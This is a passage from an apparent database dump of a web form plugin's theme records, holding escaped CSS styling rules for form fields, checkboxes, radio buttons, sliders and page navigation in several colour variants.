right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(33,'Theme 09 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #015875;\r\nmargin-bottom: 10px;\r\ncolor: #015875;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #015875 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	 background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #015875;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #015875;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #015875;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #80ABBA !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #DEE9EC;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #5C90A2;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/03/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(34,'Theme 09 transparent (lightgreen button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #30D1B1;\r\nmargin-bottom: 10px;\r\ncolor: #30D1B1;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: 